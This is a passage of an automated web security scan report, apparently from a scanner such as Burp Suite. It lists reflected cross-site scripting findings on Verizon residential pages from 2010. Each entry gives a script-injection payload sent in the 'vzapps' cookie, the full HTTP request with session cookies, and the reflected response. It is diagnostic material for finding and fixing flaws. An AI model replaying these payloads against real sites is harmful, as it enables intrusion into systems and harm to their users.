Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:33 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX3381E'><SCRIPT>ALERT(1)</SCRIPT>DA092E131C ' />
...[SNIP]...

1.157. http://www22.verizon.com/residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b6938'><script>alert(1)</script>d8e98f3fbfc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXb6938'><script>alert(1)</script>d8e98f3fbfc; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 80584
Expires: Sat, 20 Nov 2010 01:44:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:16 GMT
Connection: close
Set-Cookie: ContextInfo_FIOSType=; expires=Fri, 19-Nov-2010 01:44:16 GMT; path=/
Set-Cookie: ContextInfo_State=TXb6938'><script>alert(1)</script>d8e98f3fbfc; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:16 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow"><link href="/content/comm
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB6938'><SCRIPT>ALERT(1)</SCRIPT>D8E98F3FBFC ' />
...[SNIP]...

1.158. http://www22.verizon.com/residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 90f53<script>alert(1)</script>7ec7b19d265 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/MarketingLanding/triple_play_M_m2m/triple_play_M_m2m HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX90f53<script>alert(1)</script>7ec7b19d265; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 80580
Expires: Sat, 20 Nov 2010 01:44:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:17 GMT
Connection: close
Set-Cookie: ContextInfo_FIOSType=; expires=Fri, 19-Nov-2010 01:44:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX90f53<script>alert(1)</script>7ec7b19d265; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:17 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow"><link href="/content/comm
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX90F53<SCRIPT>ALERT(1)</SCRIPT>7EC7B19D265 </DIV>
...[SNIP]...

1.159. http://www22.verizon.com/residential/bundles/Overview.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/Overview.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 2b335<script>alert(1)</script>16e9b943a7a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/Overview.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX2b335<script>alert(1)</script>16e9b943a7a; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110975
Expires: Sat, 20 Nov 2010 01:44:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:44:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX2b335<script>alert(1)</script>16e9b943a7a; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:37 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:37 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:37 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX2B335<SCRIPT>ALERT(1)</SCRIPT>16E9B943A7A </DIV>
...[SNIP]...

1.160. http://www22.verizon.com/residential/bundles/Overview.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/Overview.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 632cf'><script>alert(1)</script>e25c179379a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/Overview.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX632cf'><script>alert(1)</script>e25c179379a; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112521
Expires: Sat, 20 Nov 2010 01:44:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:44:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX632cf'><script>alert(1)</script>e25c179379a; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:36 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX632CF'><SCRIPT>ALERT(1)</SCRIPT>E25C179379A ' />
...[SNIP]...

1.161. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94131'><script>alert(1)</script>d157d89b549 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; V347=0; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; VZGEO=west; vzAppID=; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; lob=dotcom; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vzapps=STATE=TX94131'><script>alert(1)</script>d157d89b549; ContextInfo_LoopQual=; ContextInfo_State=TX; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/Internet/; RVServiceLocation=TX; Source=Internet; CP=null*

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112509
Expires: Sat, 20 Nov 2010 01:42:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:42:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX94131'><script>alert(1)</script>d157d89b549; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:18 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX94131'><SCRIPT>ALERT(1)</SCRIPT>D157D89B549 ' />
...[SNIP]...

1.162. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 88686<script>alert(1)</script>d32df840ae1 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; V347=0; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; VZGEO=west; vzAppID=; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; lob=dotcom; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vzapps=STATE=TX88686<script>alert(1)</script>d32df840ae1; ContextInfo_LoopQual=; ContextInfo_State=TX; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/Internet/; RVServiceLocation=TX; Source=Internet; CP=null*

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112505
Expires: Sat, 20 Nov 2010 01:42:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:42:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX88686<script>alert(1)</script>d32df840ae1; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:19 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX88686<SCRIPT>ALERT(1)</SCRIPT>D32DF840AE1 </DIV>
...[SNIP]...

1.163. http://www22.verizon.com/residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d85b'><script>alert(1)</script>5082b5b050b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX5d85b'><script>alert(1)</script>5082b5b050b; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64992
Expires: Sat, 20 Nov 2010 02:31:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:31:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX5d85b'><script>alert(1)</script>5082b5b050b; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5D85B'><SCRIPT>ALERT(1)</SCRIPT>5082B5B050B ' />
...[SNIP]...

1.164. http://www22.verizon.com/residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 14cf2<script>alert(1)</script>b401d05d87d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX14cf2<script>alert(1)</script>b401d05d87d; PageTitle=Livechat; 